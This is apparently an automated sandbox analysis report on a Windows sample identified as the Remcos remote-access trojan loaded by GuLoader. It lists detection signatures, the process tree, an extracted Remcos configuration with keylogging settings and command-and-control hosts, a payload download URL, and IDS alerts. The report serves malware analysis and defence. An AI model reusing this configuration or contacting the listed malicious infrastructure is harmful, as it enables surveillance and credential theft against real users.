Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LrBF2Z930N.exe

Overview

General Information

Sample name:LrBF2Z930N.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:4e8d586a950492c30147b7d56bcfad49cd577966
Analysis ID:1590918
MD5:25eec63edf7c0eb8628a89712b5cb363
SHA1:4e8d586a950492c30147b7d56bcfad49cd577966
SHA256:e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LrBF2Z930N.exe (PID: 6456 cmdline: "C:\Users\user\Desktop\LrBF2Z930N.exe" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)
    • LrBF2Z930N.exe (PID: 516 cmdline: "C:\Users\user\Desktop\LrBF2Z930N.exe" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)
      • LrBF2Z930N.exe (PID: 1016 cmdline: C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\rldkxktiiyi" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)
      • LrBF2Z930N.exe (PID: 6816 cmdline: C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\tgicxdejwgafity" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)
      • LrBF2Z930N.exe (PID: 7004 cmdline: C:\Users\user\Desktop\LrBF2Z930N.exe /stext "C:\Users\user\AppData\Local\Temp\einnyvodjoskszmffx" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)
      • wscript.exe (PID: 4760 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000002.4483574475.00000000368EE000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 7 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LrBF2Z930N.exe, ProcessId: 516, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\LrBF2Z930N.exe", ParentImage: C:\Users\user\Desktop\LrBF2Z930N.exe, ParentProcessId: 516, ParentProcessName: LrBF2Z930N.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , ProcessId: 4760, ProcessName: wscript.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\LrBF2Z930N.exe", ParentImage: C:\Users\user\Desktop\LrBF2Z930N.exe, ParentProcessId: 516, ParentProcessName: LrBF2Z930N.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , ProcessId: 4760, ProcessName: wscript.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\LrBF2Z930N.exe", ParentImage: C:\Users\user\Desktop\LrBF2Z930N.exe, ParentProcessId: 516, ParentProcessName: LrBF2Z930N.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , ProcessId: 4760, ProcessName: wscript.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LrBF2Z930N.exe, ProcessId: 516, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\LrBF2Z930N.exe", ParentImage: C:\Users\user\Desktop\LrBF2Z930N.exe, ParentProcessId: 516, ParentProcessName: LrBF2Z930N.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\lwze.vbs" , ProcessId: 4760, ProcessName: wscript.exe

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\LrBF2Z930N.exe, ProcessId: 516, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T15:32:12.746195+010020327761Malware Command and Control Activity Detected192.168.2.56163243.226.229.2093980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T15:32:14.153429+010020327771Malware Command and Control Activity Detected43.226.229.2093980192.168.2.561632TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T15:32:15.422525+010028033043Unknown Traffic192.168.2.561634178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T15:32:07.043325+010028032702Potentially Bad Traffic192.168.2.561631109.99.162.14443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.4458828741.00000000069A4000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batReversingLabs: Detection: 26%
              Source: LrBF2Z930N.exeVirustotal: Detection: 34%Perma Link
              Source: LrBF2Z930N.exeReversingLabs: Detection: 26%
              Source: Yara matchFile source: 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4483574475.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4458828741.00000000069BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3652191797.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4458828741.00000000069A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: LrBF2Z930N.exe PID: 516, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
              Source: LrBF2Z930N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:61631 version: TLS 1.2
              Source: LrBF2Z930N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_378610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_378610F1
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 4_2_37866580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_37866580
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\eftermodnendes\ringeagt\Respecialisters\Vaelger.AbrJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\AppData\Local\Temp\nse8209.tmpJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\eftermodnendes\ringeagt\Respecialisters\gramaries.OveJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\Desktop\LrBF2Z930N.exeJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:61632 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 43.226.229.209:3980 -> 192.168.2.5:61632
              Source: Malware configuration extractorURLs: linktreewealth.zapto.org
              Source: Malware configuration extractorURLs: linktreewealth.zapto.org
              Source: Malware configuration extractorURLs: linktreewealthy.zapto.org
              Source: global trafficTCP traffic: 192.168.2.5:61632 -> 43.226.229.209:3980
              Source: global trafficTCP traffic: 192.168.2.5:61448 -> 162.159.36.2:53
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 109.99.162.14 109.99.162.14
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:61634 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:61631 -> 109.99.162.14:443
              Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: LrBF2Z930N.exe, 00000004.00000002.4484694485.0000000037830000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: LrBF2Z930N.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: LrBF2Z930N.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: LrBF2Z930N.exe, 00000004.00000002.4484314987.0000000037740000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: LrBF2Z930N.exe, 00000004.00000002.4484314987.0000000037740000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: teldrum.ro
              Source: global trafficDNS traffic detected: DNS query: linktreewealth.zapto.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: LrBF2Z930N.exe, 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: LrBF2Z930N.exe, 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3643550091.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3657134971.0000000006A18000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3656948294.0000000006A0E000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3686267728.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3647438962.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3687706334.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626939774.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626980783.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3652153611.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: LrBF2Z930N.exe, 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3626980783.00000000069D3000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3643661396.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, LrBF2Z930N.exe, 00000004.00000003.3647469796.00000000069CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpXp
              Source: LrBF2Z930N.exe, 00000000.00000000.2097681072.000000000040A000.00000008.00000001.01000000.00000003.sdmp, LrBF2Z930N.exe, 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmp, LrBF2Z930N.exe, 00000004.00000000.3383237731.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: LrBF2Z930N.exeString found in binary or memory: http://www.ebuddy.com
              Source: LrBF2Z930N.exeString found in binary or memory: http://www.imvu.com
              Source: LrBF2Z930N.exe, 00000004.00000002.4484694485.0000000037830000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: LrBF2Z930N.exe, 00000004.00000002.4484694485.0000000037830000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: LrBF2Z930N.exeString found in binary or memory: http://www.nirsoft.net/
              Source: LrBF2Z930N.exe, 00000004.00000001.3385362430.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
              Source: LrBF2Z930N.exe, 00000004.00000001.3385362430.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
              Source: LrBF2Z930N.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: LrBF2Z930N.exe, 00000004.00000002.4458828741.0000000006968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/
              Source: LrBF2Z930N.exe, 00000004.00000002.4459637902.0000000006B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
              Source: LrBF2Z930N.exe, 00000004.00000002.4459637902.0000000006B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin
              Source: LrBF2Z930N.exeString found in binary or memory: https://www.google.com
              Source: LrBF2Z930N.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 61631 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61631
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:61631 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LrBF2Z930N.exeJump to behavior
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040987A
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004098E2
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_00406DFC
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_00406E9F
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004068B5
              Source: C:\Users\user\Desktop\LrBF2Z930N.exeCode function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000004.00000003.3686330265.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.3656973543.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4483574475.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
